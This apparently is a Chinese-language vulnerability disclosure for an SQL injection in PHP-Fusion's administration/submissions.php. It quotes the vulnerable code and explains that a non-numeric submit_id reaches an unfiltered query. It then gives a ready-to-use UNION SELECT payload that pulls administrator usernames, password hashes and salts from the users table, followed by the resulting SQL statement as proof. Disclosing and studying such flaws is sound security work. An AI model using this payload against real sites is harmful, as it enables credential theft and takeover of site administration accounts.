<ul><li>/administration/submissions.php</li></ul><pre class="">if ((isset($_GET['action']) && $_GET['action'] == "2") && (isset($_GET['t']) && $_GET['t'] == "n")) {
if (isset($_POST['publish']) && (isset($_GET['submit_id']) && isnum($_GET['submit_id']))) {
$result = dbquery("SELECT ts.*, tu.user_id, tu.user_name FROM ".DB_SUBMISSIONS." ts
LEFT JOIN ".DB_USERS." tu ON ts.submit_user=tu.user_id
WHERE submit_id='".$_GET['submit_id']."'");
if (dbrows($result)) {
...
closetable();
} else {
redirect(FUSION_SELF.$aidlink);
}
} else if (isset($_POST['delete']) && (isset($_GET['submit_id']) && isnum($_GET['submit_id']))) {
...
} else {
if ($settings['tinymce_enabled'] == 1) echo "<script type='text/javascript'>advanced();</script>\n";
$result = dbquery("SELECT ts.submit_criteria, tu.user_id, tu.user_name, tu.user_status
FROM ".DB_SUBMISSIONS." ts
LEFT JOIN ".DB_USERS." tu ON ts.submit_user=tu.user_id
WHERE submit_id='".$_GET['submit_id']."'");
if (dbrows($result)) {
</pre><p>当submit_id不为数字时,会进入最后的else,其中未经过过滤带入SQL语句中并执行,造成SQL注入的产生。</p><p>当用户提交:</p><pre class="">action=2&aid=b62fe86d93a634b6&t=n&submit_id=1%27+union+select+1%2C2%2C%28select+concat%28user_name%2C0x3a3a%2Cuser_admin_password%2C0x3a%2Cuser_admin_salt%29+from+fusionp2SUI_users+limit+0%2C1%29%2C4%23</pre><p>执行的SQL语句为:</p><pre class="">SELECT ts.submit_criteria, tu.user_id, tu.user_name, tu.user_status FROM fusionp2SUI_submissions ts LEFT JOIN fusionp2SUI_users tu ON ts.submit_user=tu.user_id WHERE submit_id='1' union select 1,2,(select concat(user_name,0x3a3a,user_admin_password,0x3a,user_admin_salt) from fusionp2SUI_users limit 0,1),4#'</pre><p>页面返回: </p><p><img alt="9F0180E1-FCED-4DC4-98FB-40DC641B03B0.png" src="https://images.seebug.org/@/uploads/1434695535297-9F0180E1-FCED-4DC4-98FB-40DC641B03B0.png" data-image-size="703,158"><br></p><p>证明漏洞存在。</p>
京公网安备 11010502034610号
暂无评论